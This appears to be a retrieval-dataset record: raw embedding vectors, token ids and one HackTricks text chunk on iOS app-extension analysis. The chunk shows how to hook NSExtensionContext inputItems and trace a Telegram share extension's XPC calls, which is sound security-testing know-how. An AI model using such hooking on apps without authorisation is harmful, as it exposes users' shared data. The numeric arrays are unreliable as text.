0.34073910117149353, -0.37397271394729614, 0.8596381545066833, 0.9644341468811035, -0.10342380404472351, -0.41328561305999756, -0.1003907173871994, -0.16455629467964172, -0.2603739798069, 0.15203101933002472, 0.6903653144836426, -0.9787977933883667, 0.2988855540752411, -0.2572885751724243, 0.17377223074436188, 1.2625125646591187, 0.028120726346969604, 0.014683810994029045, -0.05745965987443924, 0.4994744062423706, 0.38616546988487244, -0.6652239561080933, 0.20077607035636902, -0.2944851815700531, 0.6976086497306824, 0.5419096350669861, 1.3539674282073975, 0.9391047358512878, -0.36493995785713196, 0.11746800690889359, 0.2826854884624481, 1.0272808074951172, 0.2493378221988678, 0.18707430362701416, 0.7304813861846924, -0.165960893034935, 0.34197208285331726, 0.9061881303787231, -0.0038772637490183115, 0.16083189845085144, 0.060972657054662704, 0.55755215883255, 0.9061035513877869, -0.5344287753105164, 0.7459518313407898, 0.6948395371437073, -0.05728435516357422, -1.2660857439041138, -0.43415579199790955, 0.3529551327228546, 0.7541249990463257, -0.7134525179862976, -0.6275356411933899, 0.1480616182088852, 0.3827783465385437, -0.2453775256872177, 0.1290983408689499, -0.15531842410564423, 0.36506685614585876, -0.23798905313014984, 0.154550239443779, -0.6739698052406311, -0.6539602279663086, -0.8292649388313293, -0.4854966104030609, -1.0750013589859009, -0.8066937327384949, -0.6566269993782043, -0.24300231039524078, 0.24496378004550934, -0.5670191049575806, 0.5810769200325012, -0.23687997460365295, -0.597220242023468, -0.08908972889184952, 0.5256670117378235, 0.4538891315460205, -0.5913718938827515, 0.3940778374671936, -0.6327894926071167, 0.6490426659584045, 0.010952279902994633, 1.0334727764129639, -0.1907196044921875, 0.1924613118171692, 0.06324237585067749, -0.45486581325531006, 0.3895978033542633, -0.38042402267456055, 0.2308022528886795, 0.4719012379646301, -0.21224331855773926, -0.10255272686481476, -0.08982818573713303, -0.031574249267578125, 0.22982263565063477, 0.16915102303028107, -0.43036919832229614, 0.5939527750015259, -0.060071855783462524, 0.029165346175432205, 0.6854104995727539, 0.030042685568332672, -0.35780245065689087, 0.24225829541683197, 0.25493329763412476, 0.1987183392047882, -0.7071673274040222, -0.09890010952949524, 0.3202737271785736, 0.30106085538864136, -0.4062766432762146, 0.06287103146314621, -0.06351158022880554, -0.286786288022995, -0.06499780714511871, -0.11878256499767303, -0.42840808629989624, -0.3321308493614197, -0.30360904335975647, -0.8895607590675354, 0.6212316155433655, -0.36170047521591187, -0.6578173637390137, -0.40222668647766113, -0.5220916271209717, 0.9791468977928162, -0.49904462695121765, 0.04791858419775963, -0.030667006969451904, -0.7460649609565735, 0.6048822402954102, 0.0030040498822927475, 0.31985604763031006, -0.44776639342308044, -0.0899004340171814, -0.36598965525627136, -0.1853565275669098, 0.3680785000324249, 0.16404807567596436, -0.010458556935191154, 0.19802212715148926, -0.1753329038619995, -0.3559713363647461, -0.078255295753479, -0.13103674352169037, 0.40182700753211975, 0.25584498047828674, 0.9166995882987976, -0.314063161611557, -0.3850751519203186, 0.05298623815178871, 0.1548524647951126, 0.47391653060913086, 0.5079242587089539, 0.04023411497473717, 0.07201551645994186, -0.5069462656974792, -0.3698020279407501, 0.1906963586807251, 0.2745833396911621, 0.38367918133735657, -0.06628266721963882, 0.8134970664978027, -0.5481022596359253, 0.03781107813119888, 0.6709003448486328, -0.3778002858161926, -0.7836809754371643, 0.9447979927062988, 0.3373115360736847, 0.46837568283081055, -0.7216256856918335, 0.19660963118076324, 0.14226901531219482, -0.058531228452920914, 0.4060823917388916, 0.39074674248695374, 0.30180925130844116, -0.43108752369880676, -0.5204504728317261, 0.19712986052036285, -0.4003802537918091, 0.14732882380485535, 0.09166016429662704, 0.03081461600959301, -0.2221425622701645, -0.5729288458824158, -0.4934607446193695, 0.39289358258247375, 0.48270854353904724, 0.5469741225242615, 0.4560116231441498, 0.8152319192886353, 0.727178156375885, -0.5749393105506897, 0.37985125184059143, -0.45655083656311035, 0.03052329458296299, -0.1452256292104721, 0.4562421143054962, -0.7045429348945618, -0.26836153864860535, -0.44335198402404785, -0.7141990661621094, -0.6056968569755554, -0.4372096359729767, 0.02164940908551216, 0.4043373763561249, -0.3823067545890808, -0.49577778577804565, -0.15255852043628693, 0.6738902926445007, -0.9248130321502686, -0.021130098029971123, -0.3515297770500183, 0.12470351159572601, 0.47040456533432007, -0.6986539363861084, 0.38693273067474365, -0.8052342534065247, 0.2748009264469147, -0.018543783575296402, -0.5588380694389343, -0.38465753197669983, -0.6788661479949951, -0.41742798686027527, -0.5642780065536499, 0.5150537490844727, 0.97287517786026, -0.22267785668373108, 0.09801329672336578, -0.9577291011810303, 0.06590361893177032, 0.9806666970252991, -0.698937177658081, -0.2171519249677658, -0.2950246036052704, 0.6714586615562439, 0.5221735835075378, 0.6364946365356445, -0.25794529914855957, 0.33489474654197693, 0.08760629594326019, -0.698380172252655, 0.6976035237312317, -0.726405143737793, -0.2398628294467926, 0.5715277791023254, -0.1326746940612793, 0.23797786235809326, 0.32299500703811646, -0.9840975403785706, 0.7374571561813354, 0.08901601284742355, 0.626792848110199, 0.20579883456230164, -0.4648338556289673, 1.1068613529205322, -0.49891212582588196, -0.44253283739089966, 0.7882208228111267, 0.3540419638156891, -0.11672962456941605, -0.22483296692371368, -0.27492669224739075, -0.13720524311065674, 0.981183648109436, -0.2909345328807831, 0.11986131221055984, -0.22568915784358978, 0.1567162275314331, -0.22716769576072693, -0.5961323380470276, 0.8229617476463318, -0.05400201305747032, 0.3938048779964447, -0.7178723216056824, -0.45179349184036255, -0.0055709173902869225, 0.059697844088077545, -0.20518913865089417, 0.9184353947639465, 0.6288769841194153, -0.3949960470199585, -0.30013057589530945, 0.1746143251657486, -0.7613710165023804, -0.6357031464576721, -0.04508271440863609, -0.13209860026836395, 0.08872445672750473, 0.1243433728814125, 0.5578970909118652, -0.1657770723104477, -0.23272167146205902, 0.4329732358455658, 0.16061721742153168, 0.5173174738883972, -1.1203835010528564, -0.4269430637359619, -0.3577881157398224, -0.22099295258522034, 0.042086005210876465, 0.5466212630271912, 0.24285510182380676, 0.6464745402336121, 0.22618313133716583, -0.0608602911233902, 0.5955938100814819, -0.1902708113193512, -1.0470243692398071, 0.5951895117759705, 0.3014717698097229, -0.20794372260570526, -0.5282739996910095, 0.18228276073932648, 0.029401959851384163, -0.40764835476875305, -0.36190593242645264, -0.13213801383972168, -0.6966251134872437, -0.6352086663246155, 0.05168502777814865, -0.27931544184684753, 0.1949133425951004, -0.6812666058540344, -0.19658680260181427, 0.15820449590682983, 0.7496388554573059, -0.25335216522216797, -0.43482670187950134, 0.4259299635887146, -0.265175998210907, -0.026853427290916443, -0.06834011524915695, -0.18915988504886627, -0.6853112578392029, 0.25613003969192505, -0.48249194025993347, 0.456806480884552, -0.20035599172115326, -0.3645082116127014, -0.34872058033943176, -0.5440855622291565, 0.1297587752342224, -0.008341359905898571, -0.014791657216846943, -0.3711155652999878, 0.3880367577075958, -0.19403378665447235, -0.8675796985626221, 0.4343166649341583, -0.5866695642471313, 0.7947496771812439, -0.5474661588668823, -0.3818812966346741, 0.24237021803855896, -0.2194603979587555, -0.39021965861320496, -0.32591092586517334, 0.4685225188732147, -0.8346362709999084, -0.03863602504134178, -0.773956298828125, 0.4528246819972992, 0.17374150454998016, -0.1871706247329712, -1.431763768196106, 0.49377885460853577, -0.505376935005188, -0.9706878066062927, 0.3676777482032776, -0.21335938572883606, 0.0722721666097641, -0.3309652507305145, -0.031257081776857376, 0.18168002367019653, -0.39145612716674805, -0.3854958117008209, 0.761689305305481, -0.3677496016025543, 0.11398328840732574, 0.044063884764909744, 0.8883349299430847, 0.11089293658733368, -0.3544871509075165, 0.34569573402404785, -0.729611873626709, -0.06163165718317032, -0.3483383059501648, -0.7673603296279907, -0.054306257516145706, -0.3689822852611542, -0.05781786888837814, 0.1101095974445343, -0.012633654288947582, 0.42635345458984375, 0.39269179105758667, -0.9523650407791138, -0.20217052102088928, 0.22960588335990906, -0.2947729527950287, -0.31830471754074097, 0.9142002463340759, 0.17300479114055634, -0.05241081491112709, -0.29579034447669983, 0.06740397959947586, -0.1277593970298767, -0.03628509119153023, 0.9772048592567444, -0.09169388562440872, -0.6061164736747742, 1.242792010307312, 0.4081416130065918, -0.738368809223175, -0.027908429503440857, 0.20630411803722382, -0.37567150592803955, 0.13635674118995667, -0.1487288773059845, 0.2732948958873749, 0.2588041424751282, -0.36319294571876526, -0.17920534312725067, 0.551199734210968, 0.09131132811307907, 0.10788816213607788, -0.29489630460739136, 0.798153281211853, 0.22497233748435974, 0.10465266555547714, 0.41342693567276, -0.9961293935775757, -0.5502736568450928, 0.09685395658016205, 0.09806878119707108, -0.13257600367069244, -0.26961416006088257, 0.9448679685592651, -0.39973175525665283, -0.07621803134679794, 0.16617095470428467, -0.3894043564796448, 0.1361892819404602, -0.07557443529367447, 0.12874047458171844, 0.7935289144515991, 0.06983467191457748, -0.3861038088798523, -0.3616591691970825, 0.6547361612319946, 0.04530768841505051, -0.04737069457769394, -0.2836451530456543, 0.512029767036438, 0.07462793588638306, 0.3025150001049042, 0.11529020220041275, -0.7778667211532593, -1.0203603506088257, -1.1066093444824219, 0.38578271865844727, 0.00905547197908163, -0.1639091670513153, 0.21026496589183807, 0.9637374877929688, -0.1229742243885994, -0.6124277114868164, -0.30912819504737854, 0.5377405881881714, 0.036422859877347946, 0.32647162675857544, -0.668177604675293, 0.18437159061431885, -0.3558986186981201, -0.03367036581039429, -0.44264355301856995, -0.16438353061676025, -0.1545800268650055, -0.28214484453201294, -0.7610737085342407, -0.15736597776412964, -0.6021988391876221, 0.04921752214431763, -0.011774796061217785, 0.20811393857002258, -0.3811197578907013, -0.6333669424057007, 0.5424404740333557, 1.182093620300293, -0.2594020664691925, -0.16664499044418335, 0.2437972128391266, -0.11105062812566757, 0.06682625412940979, -0.24439993500709534, -0.21718163788318634, -0.5769488215446472, 0.150143101811409, 0.2344481199979782, 0.11165609210729599, -0.4232596457004547, -0.18378670513629913, -0.2085503190755844, -1.2371975183486938, 0.013473033905029297, -0.20873382687568665, -0.27265986800193787, 0.32524535059928894, -0.32605430483818054, -0.18570154905319214, 0.6430695056915283, 0.5448909997940063, 0.8689578771591187, -0.8847491145133972, -0.16542428731918335, 0.7325524687767029, 0.4512096047401428, 0.18077941238880157, 0.4148092567920685, -0.35757577419281006, -0.6720830202102661, -0.19399602711200714, 0.5243066549301147, -0.44044625759124756, 0.6280412673950195, 0.0624847412109375, -0.284119576215744, -0.3739244043827057, 0.35327303409576416, 0.09448984265327454, 0.354157954454422, 0.12695680558681488, 0.003862739074975252, 0.39518091082572937, -0.5726612210273743, -0.5563772916793823, -0.24292787909507751, -0.9358186721801758, -0.5713558197021484, 0.8822773098945618, 0.2757619023323059, -1.0604013204574585, -0.44524064660072327, -0.156765416264534, -0.02432677522301674, 0.1344991773366928, -0.11936358362436295, 0.29791325330734253, -0.08312363922595978, -0.6824772953987122, 0.4921943247318268, -0.6711705923080444, -0.3333556056022644, -0.16101160645484924, 0.33791837096214294, -0.9442267417907715, -0.6394895315170288, 0.5746904015541077, 0.9221680760383606, 0.12177428603172302, 0.2460733950138092, -0.6840230822563171, 0.3026924431324005, 0.5520733594894409, 0.18091610074043274, 0.20921805500984192, -0.030521702021360397, -0.9220398664474487, 0.33239656686782837, -0.3926762640476227, 0.347736656665802, -0.45099854469299316, -0.15113802254199982, -0.10015873610973358, -0.12271231412887573, -0.14632466435432434, 0.26959794759750366, 0.48569053411483765, -0.022347379475831985, 0.836112380027771, 0.5461661219596863, 0.6037042140960693, -0.09626634418964386, -0.3520062565803528, 0.013414151035249233, 0.5737499594688416, 0.08988956362009048, 0.4234407842159271, -0.16771478950977325, 0.37498190999031067, 0.42827120423316956, -0.28302067518234253, -0.19937290251255035, 0.3243221342563629, -0.19749905169010162, -0.15302932262420654, 0.4498450756072998, -0.41145059466362, -0.09542366117238998, 0.30511391162872314, -0.4679102301597595, 0.04089481756091118, -0.23644587397575378, 0.1289072185754776, -0.012226459570229053, -0.10384345799684525, 0.27992314100265503, -0.771199107170105, 0.3433529734611511, 0.004923997912555933, 0.7268409132957458, 0.3894299566745758, 0.0050539602525532246, -0.6391312479972839, 0.5959108471870422, 0.756623387336731, 0.22016775608062744, 0.7129178643226624, 0.42237934470176697, -0.2772165536880493, 0.3102225065231323, 0.3772975504398346, -0.42872902750968933, -0.5450924634933472, 0.5665135383605957, -0.17879590392112732, -0.6858232021331787, -0.36214762926101685, -0.07929075509309769, 0.5766147971153259, 0.13279765844345093, 0.0823046937584877, -0.3210815489292145, -0.46407079696655273, -0.5351724624633789, -0.005636871326714754, -0.8251743912696838, 0.40515485405921936, 0.2221149355173111, -1.0391833782196045, -0.3366937041282654, 0.36571311950683594, -0.3087943494319916, 0.5060570240020752, 0.19080519676208496, 0.4723220467567444, -0.05074237287044525, 0.8992221355438232, 0.4389128088951111, -0.36942049860954285, -0.2344590276479721, 0.07153548300266266, 0.13172297179698944, -0.24643149971961975, -0.295686274766922, -0.1782931089401245, 0.4654482305049896, 0.20399194955825806, -0.2910221517086029, -0.14476563036441803, -0.307320237159729, -0.4430253207683563, -0.8336468935012817, 0.06521376967430115, 0.2855774760246277, -0.46038931608200073, -0.15459047257900238, -0.12493220716714859, -0.12521153688430786, 0.5443475842475891, -0.336275577545166, -0.833518385887146, -0.11865901947021484, -0.12481378018856049, -0.0048377434723079205, 1.0027210712432861, -0.10332858562469482, -0.10140886157751083, 0.34054532647132874, -0.6722893714904785, -0.3447566628456116, 0.0627157911658287, -0.2856326699256897, -0.4236057996749878, 0.5611315369606018, -0.5214862823486328, 0.6514188051223755, 0.08519009500741959, -0.29513540863990784, -0.6614415645599365, 0.15935088694095612, 0.687562108039856, -0.624269962310791, 1.0257349014282227, 0.5100222826004028, 0.18412064015865326, 0.5707534551620483, -0.3102115988731384, 0.8868755102157593, -0.08678256720304489, -0.5408107042312622, -0.40964311361312866, -0.1457698494195938, -0.8820542693138123, -0.4756028354167938, -0.3492905795574188, -0.1338614970445633, -0.16045188903808594, 0.29353106021881104, -1.1892224550247192, -0.1770133674144745, -1.1640113592147827, 0.515717089176178, -0.08119983226060867, 0.4594604969024658, 0.4506254494190216, -0.27311497926712036, 1.1566224098205566, -1.234981656074524, 4.442279815673828, 0.5462380647659302, -0.0192570760846138, 0.06809888780117035, -0.0006255462649278343, 0.516092836856842, 1.519012212753296, -0.9681510329246521, 0.2613987922668457, -0.16423378884792328, 0.321806401014328, -0.39574944972991943, 0.3654688596725464, 0.05164405703544617, 0.45668232440948486, 0.492264986038208, -0.7157981395721436, 0.14051015675067902, 0.586994469165802, -0.44453129172325134, -0.9572116136550903, -0.11834811419248581, -0.2530815005302429, 0.9855222702026367, 0.2811591327190399, 0.3917083740234375, 0.03877164423465729, -0.39509838819503784, -0.2634575068950653, -0.44376489520072937, 0.33354684710502625, -0.4938786029815674, 0.14222092926502228, -0.5581909418106079, -0.43552365899086, 0.41969040036201477, 0.19591739773750305, -0.8551602959632874, -0.19780045747756958, -0.35355421900749207, -0.18427012860774994, -0.15701055526733398, 0.006648034788668156, 0.2774716913700104, 0.5387405157089233, 0.3096838593482971, 0.1594334840774536, -0.10567662864923477, 0.42272061109542847, -1.243906021118164, 0.4524289667606354, -0.7494257092475891, 0.6624681949615479, -0.7099890112876892, -0.9324418306350708, -0.22316235303878784, 0.09003061801195145, -0.36729681491851807, 0.28509312868118286, -0.15069757401943207, 0.8120471835136414, -0.569647490978241, -0.015631651505827904, 0.23643767833709717, -0.8989991545677185, -0.09278904646635056, -0.20790603756904602, 1.0621756315231323, 0.4610682725906372, 0.149057075381279, -0.5603750944137573, 0.12489927560091019, -0.41912806034088135, -0.37850749492645264, 0.890346109867096, -0.17363186180591583, -0.44166451692581177, 0.40037301182746887, 0.06600914150476456, -1.0234135389328003, 0.03948979452252388, -0.5246984362602234, -0.37629860639572144, 0.5534067749977112, 1.2103550434112549, 1.008275032043457, -0.30312901735305786, -0.7980838418006897, 0.2872573435306549, 0.18457917869091034, 0.49141302704811096, -0.16078272461891174, -0.25609537959098816, 0.20192386209964752, -0.12260175496339798 ]
[ 2090, 2023, 1998, 2951, 6631, 3081, 21318, 18908, 7730, 2073, 2057, 2018, 2000, 9375, 1996, 6254, 4127, 1010, 2036, 2478, 21183, 2483, 1012, 2019, 10439, 2515, 2025, 2342, 2000, 2031, 2019, 5331, 2005, 2008, 1012, 2009, 2003, 2825, 2000, 3745, 2951, 2478, 2069, 21318, 18908, 7730, 1012, 22459, 1996, 10439, 5331, 1005, 1055, 18558, 1012, 20228, 2923, 5371, 1998, 3945, 2005, 24978, 10288, 29048, 18908, 25761, 6820, 2571, 1012, 2008, 3145, 27171, 1996, 2951, 2108, 3569, 2004, 2092, 2004, 1041, 1012, 1043, 1012, 4555, 1997, 5167, 3569, 1012, 2005, 2742, 1024, 1026, 3145, 1028, 24978, 10288, 29048, 19321, 3089, 8569, 4570, 1026, 1013, 3145, 1028, 1026, 4487, 6593, 1028, 1026, 3145, 1028, 24978, 10288, 29048, 18908, 25761, 6820, 2571, 1026, 1013, 3145, 1028, 1026, 4487, 6593, 1028, 1026, 3145, 1028, 24978, 10288, 29048, 18908, 25761, 6342, 9397, 11589, 5332, 26860, 24415, 17848, 3597, 16671, 1026, 1013, 3145, 1028, 1026, 16109, 1028, 2184, 1026, 1013, 16109, 1028, 1026, 3145, 1028, 24978, 10288, 29048, 18908, 25761, 6342, 9397, 11589, 25855, 8584, 8939, 17848, 3597, 16671, 1026, 1013, 3145, 1028, 1026, 16109, 1028, 1015, 1026, 1013, 16109, 1028, 1026, 3145, 1028, 24978, 10288, 29048, 18908, 25761, 6342, 9397, 11589, 26760, 15878, 3126, 2140, 24415, 17848, 3597, 16671, 1026, 1013, 3145, 1028, 1026, 16109, 1028, 1015, 1026, 1013, 16109, 1028, 1026, 1013, 4487, 6593, 1028, 1026, 1013, 4487, 6593, 1028, 2069, 1996, 2951, 4127, 2556, 2182, 1998, 2025, 2383, 1014, 2004, 4098, 3597, 16671, 2097, 2022, 3569, 1012, 2174, 1010, 2062, 3375, 22910, 2003, 2825, 2011, 2478, 1037, 2061, 1011, 2170, 3653, 16467, 5164, 2008, 2097, 16157, 1996, 21183, 2483, 2445, 1012, 3531, 6523, 2000, 1996, 6207, 10439, 5331, 4730, 5009, 2005, 2062, 6851, 2592, 2055, 2023, 1012, 9361, 2951, 6631, 2007, 1996, 4820, 10439, 28578, 6633, 5677, 2008, 10439, 14305, 1998, 2037, 4820, 18726, 2079, 2025, 2031, 3622, 3229, 2000, 2169, 2060, 1521, 1055, 16143, 1012, 2174, 1010, 2951, 6631, 2064, 2022, 9124, 1012, 2023, 2003, 2589, 3081, 1000, 10439, 2967, 1000, 1998, 1996, 24978, 20330, 3207, 7011, 11314, 2015, 17928, 1012, 2156, 2023, 3275, 2013, 6207, 10439, 5331, 4730, 5009, 1024, 2004, 2036, 3855, 1999, 1996, 5009, 1010, 1996, 10439, 2442, 2275, 2039, 1037, 4207, 11661, 2065, 1996, 10439, 5331, 3594, 1996, 24978, 3126, 4877, 7971, 3258, 2465, 2000, 4685, 1037, 4281, 2039, 11066, 2030, 8816, 1010, 2061, 2008, 2119, 1996, 5331, 1998, 2049, 4820, 10439, 2064, 3229, 1996, 4015, 2951, 1012, 20410, 2075, 2065, 1996, 10439, 21573, 2015, 1996, 2224, 1997, 10439, 14305, 4183, 2003, 2825, 2000, 15454, 1037, 3563, 2828, 1997, 10439, 5331, 2011, 2478, 1996, 2206, 4118, 1024, 4646, 1024, 2323, 8095, 29385, 18413, 6132, 3258, 8400, 5178, 16778, 8873, 2121, 1024, 2174, 1010, 2009, 2003, 2747, 2069, 2825, 2005, 1000, 7661, 9019, 1000, 10439, 14305, 1006, 1998, 2323, 2022, 20119, 2043, 5604, 18726, 8304, 7591, 2951, 3081, 1996, 9019, 2066, 1041, 1012, 1043, 1012, 8169, 18726, 1007, 1012, 8790, 4106, 29278, 1996, 8790, 4106, 2057, 2064, 2079, 1996, 2206, 2000, 5114, 3716, 2302, 2383, 1996, 3120, 3642, 1024, 29508, 1996, 5167, 2108, 4207, 5178, 16778, 14116, 1996, 10439, 14305, 2920 ]
hack_tricks
434.txt
2
##inspecting the items being sharedfor this we should hook nsextensioncontext - inputitems in the data originating app. following the previous example of telegram we will now use the " share " button on a text file ( that was received from a chat ) to create a note in the notes app with it : if we run a trace, we'd see the following output : ( 0x1c06bb420 ) nsextensioncontext - inputitems0x18284355c foundation! - [ nsextension _ itemproviderforpayload : extensioncontext : ] 0x1828447a4 foundation! - [ nsextension _ loaditemforpayload : contextidentifier : completionhandler : ] 0x182973224 foundation! _ _ nsxpcconnection _ is _ calling _ out _ to _ exported _ object _ s3 _ _ 0x182971968 foundation! - [ nsxpcconnection _ decodeandinvokemessagewithevent : flags : ] 0x182748830 foundation! message _ handler0x181ac27d0 libxpc. dylib! _ xpc _ connection _ call _ event _ handler0x181ac0168 libxpc. dylib! _ xpc _ connection _ mach _ event... ret : ( " < nsextensionitem : 0x1c420a540 > - userinfo : { nsextensionitemattachmentskey = ( " < nsitemprovider : 0x1c46b30e0 > { types = ( \ n \ " public. plain - text \ ", \ n \ " public. file - url \ " \ n ) } " ) ; } " ) here we can observe that : this occurred under - the - hood via xpc, concretely it is implemented via a nsxpcconnection that uses the libxpc. dylib framework. the utis included in the nsitemprovider are public. plain - text and public. file - url, the latter being included in nsextensionactivationrule from the info. plist of the " share extension " of telegram. identifying the app extensions involvedyou can also find out which app extension is taking care of your the
[ 0.7172648310661316, -0.6314126253128052, -0.041602179408073425, 1.2062344551086426, 0.31535133719444275, 0.11814026534557343, -0.5311744809150696, -0.08074011653661728, 0.5516616702079773, -0.00873920600861311, -0.10583947598934174, 0.33849042654037476, 0.29805371165275574, -0.3634859323501587, -0.3040996789932251, -0.7422273755073547, -0.8434423208236694, 0.3617677688598633, -0.8763810992240906, -0.5950610637664795, 0.2488747090101242, -0.15611153841018677, -0.8247892260551453, -0.6670277714729309, -0.2604748606681824, 0.06786581873893738, 0.4993727505207062, -0.12368658185005188, 1.0903569459915161, 0.6336436867713928, 0.3201123774051666, 0.14540228247642517, 0.0998629778623581, -0.6339670419692993, 0.002454909263178706, -0.3152680993080139, 0.965972363948822, -0.1480712741613388, -0.2981621325016022, -0.3908853232860565, 0.1489136517047882, -0.21338994801044464, 0.6772435903549194, -0.2590011656284332, -0.8162723183631897, -0.28018832206726074, 0.3115118741989136, -0.1197262704372406, 0.33766594529151917, -0.56548011302948, 0.36270567774772644, -0.35588908195495605, 0.20940206944942474, 0.34092774987220764, 0.8605259656906128, -0.1858724057674408, -0.7948235869407654, 0.2883347272872925, -0.19296228885650635, 0.3568916916847229, -0.15023145079612732, 0.06918133795261383, 0.280131071805954, -0.5954354405403137, 0.36347660422325134, 0.2918705344200134, -0.1489442139863968, -0.37257638573646545, -0.5069643259048462, -0.5378357172012329, -0.3428798019886017, 0.3382831811904907, -0.6598235964775085, -0.29022958874702454, -0.27902358770370483, -0.535957396030426, -0.004228963516652584, -0.28730982542037964, -0.08524974435567856, 1.0250011682510376, 0.1535036265850067, 0.4351082444190979, -0.1692238748073578, 0.17645719647407532, -0.35831958055496216, -0.08806410431861877, 0.4815344512462616, -0.1729077249765396, 0.07849496603012085, 0.049961838871240616, 0.11775249987840652, 0.24421203136444092, -0.6102102398872375, -0.5724429488182068, 0.4324285089969635, 0.11076337844133377, -0.2813732326030731, 0.3586815893650055, -0.0009723322000354528, 0.0674242153763771, 0.518427848815918, 0.41707512736320496, -0.30737248063087463, 0.44738709926605225, -0.08446453511714935, 0.4444880485534668, 0.36032718420028687, -0.044232990592718124, -0.2836643159389496, -0.3661852777004242, -0.29624736309051514, 0.1955990493297577, 0.33409208059310913, -0.948640763759613, -0.42405277490615845, 0.8931702971458435, -0.07922013849020004, 0.010230443440377712, -0.6807834506034851, 0.8432969450950623, -0.2628003656864166, -0.6206883788108826, 0.08218105882406235, -0.08194088190793991, 0.5582731366157532, -0.046390045434236526, 0.5906725525856018, 0.4944472908973694, -0.6301990151405334, -0.5018717050552368, -0.0074731470085680485, 0.06611724197864532, 0.1371368020772934, 0.4143558144569397, -0.36559751629829407, -0.005422641523182392, 0.294011652469635, -0.047136545181274414, -0.05154881626367569, -0.9383814334869385, 0.21567043662071228, -0.16270002722740173, 0.24408367276191711, 1.1289520263671875, 0.5178052186965942, 0.475405752658844, -0.9597053527832031, -0.5440915822982788, -0.5068948864936829, 0.38521522283554077, 0.20114660263061523, 0.8305613994598389, 0.3017449676990509, -0.35484084486961365, -0.47917109727859497, -0.16990981996059418, -0.2022305279970169, -0.34551721811294556, 0.17500576376914978, 0.2531532347202301, -0.521238386631012, 0.9091641306877136, 0.026865370571613312, 0.5899834036827087, -0.27889832854270935, 0.3511914312839508, -0.4198192358016968, -0.7246909141540527, 0.022622747346758842, 0.23785480856895447, -0.007177591323852539, 0.4133278429508209, -0.07331404834985733, 0.23478896915912628, 0.7337175011634827, 0.6543127298355103, -0.19094480574131012, -0.27168840169906616, 0.09882844239473343, 0.18055850267410278, -0.4082724153995514, 0.20299293100833893, 0.240035742521286, 0.25876280665397644, -0.4211812913417816, -0.13254407048225403, -0.3920021951198578, -0.2851337492465973, -0.7482031583786011, -0.469460666179657, -0.6099766492843628, 0.3262424170970917, -0.49732255935668945, 0.5254231095314026, 0.8860370516777039, 0.3531288802623749, -0.5576425790786743, -0.8862438797950745, 0.02895544469356537, -1.0780041217803955, -0.6748223900794983, 0.5149802565574646, -0.12266722321510315, 0.9284522533416748, -0.7794858813285828, -0.15404541790485382, 0.6770744323730469, 0.5018593668937683, -0.1708260178565979, 0.6176035404205322, 0.6128644943237305, 0.38666629791259766, -0.5339010953903198, -0.3792646527290344, -0.09935134649276733, -0.4923807382583618, 0.003306690603494644, 0.5888673067092896, -0.7219942212104797, 0.17176569998264313, -0.04853403940796852, 0.6875954866409302, 0.7899234294891357, -0.1845046579837799, 0.017420129850506783, -0.5651172995567322, 0.26201391220092773, 0.6031072735786438, -0.39242833852767944, 0.2188374549150467, 0.1168505847454071, 0.6264671087265015, 0.2589191794395447, 0.751366913318634, 0.5598605275154114, -0.020620223134756088, 0.42953282594680786, 0.27790704369544983, 0.8375679850578308, 0.06927715241909027, 0.41489267349243164, -0.031058838590979576, 0.24991099536418915, 0.3252553939819336, 1.0582904815673828, 0.37025684118270874, 0.5510460138320923, -0.36339738965034485, 0.4473659098148346, 0.3452335298061371, -0.4017956256866455, 0.9472803473472595, 0.8480442762374878, -0.02590020000934601, -0.9009413123130798, -0.5710028409957886, 1.0367209911346436, 0.9426839351654053, -0.2412385195493698, -0.9413783550262451, -0.0977468192577362, 0.41067197918891907, -0.47239312529563904, 0.18768805265426636, 0.2822330892086029, 0.36521729826927185, -0.2259633094072342, 0.12277025729417801, -0.46910274028778076, -0.27618613839149475, -0.42773693799972534, -0.46997714042663574, -0.8719709515571594, -0.4263850450515747, -0.7664386034011841, 0.26550641655921936, 0.24834217131137848, -0.2640368938446045, 0.7963575124740601, 0.17930805683135986, -0.47252508997917175, 0.17079469561576843, -0.22738684713840485, 0.6304900646209717, 0.22774776816368103, -0.4007021188735962, -1.3445734977722168, 0.3628743886947632, 0.4162871837615967, 1.018559217453003, 0.007445902097970247, -0.36936962604522705, -0.10851392149925232, -0.03221159055829048, 0.2275715470314026, -0.22916311025619507, 0.3859899342060089, 0.24222266674041748, -0.34337130188941956, 0.26909786462783813, 0.2330237329006195, -0.14648818969726562, 0.5690903663635254, -0.21334517002105713, -0.1721683293581009, 0.655204713344574, -0.23203831911087036, -0.30255740880966187, 0.962300717830658, 0.308147132396698, -0.45562297105789185, 0.4580419361591339, -0.08840813487768173, 0.5402708053588867, -0.6134072542190552, 0.713081419467926, 0.06283948570489883, 0.34395018219947815, 0.3135210871696472, 0.4031282365322113, -0.6432275176048279, -0.23104240000247955, -0.5559902787208557, -0.4794500768184662, -0.7101671099662781, 0.09089711308479309, -0.15576209127902985, -0.9538871645927429, 0.6973680257797241, -0.6396023631095886, -0.4578723907470703, -0.029673058539628983, -0.1323142945766449, 0.8013980984687805, -0.10839467495679855, 0.2505470812320709, 0.028383050113916397, -0.5774090886116028, 0.23676389455795288, 0.15621748566627502, 0.20817989110946655, -0.6278097033500671, 0.10134539008140564, -0.49572181701660156, -0.3247215747833252, 0.3847868740558624, 0.3104434311389923, -0.3886474668979645, 0.17917212843894958, 0.0163732822984457, 0.2861059308052063, -0.1322574019432068, 0.1201368048787117, -0.06157549470663071, 0.006710493937134743, 0.40482455492019653, 0.13404400646686554, -0.3275236487388611, 0.34615492820739746, -0.11121073365211487, 0.5093680024147034, 0.10192286223173141, 0.39282548427581787, 0.08558884263038635, -0.792800784111023, -0.08513171225786209, 0.3425901234149933, 0.04469672963023186, 0.43773093819618225, -0.17741140723228455, 0.8690442442893982, -0.5639154314994812, 0.2987726330757141, 0.37563884258270264, -0.7800649404525757, -0.8731703758239746, 0.008710063993930817, 0.12625086307525635, 0.22525262832641602, -0.375363290309906, 0.069188192486763, 0.25515779852867126, 0.3593901991844177, 0.3858756422996521, 0.4888438582420349, 0.3631711006164551, -0.607617974281311, 0.2873155176639557, 0.46480026841163635, -0.38812604546546936, 0.64342200756073, -0.3368564248085022, 0.09392360597848892, -0.10315530747175217, -0.6141369938850403, -0.4302089512348175, 0.5632001161575317, 0.5708496570587158, 0.8123292922973633, 0.05719100311398506, 0.934171199798584, 0.9199203252792358, -0.04618972912430763, 0.6995090246200562, -0.1702851504087448, -0.019783226773142815, -0.4064280390739441, 0.4928583800792694, -0.23690471053123474, -0.008426911197602749, -0.276425838470459, -0.703883707523346, -0.028763100504875183, -0.3629518747329712, 0.18262101709842682, 0.4190565049648285, -0.6766623258590698, 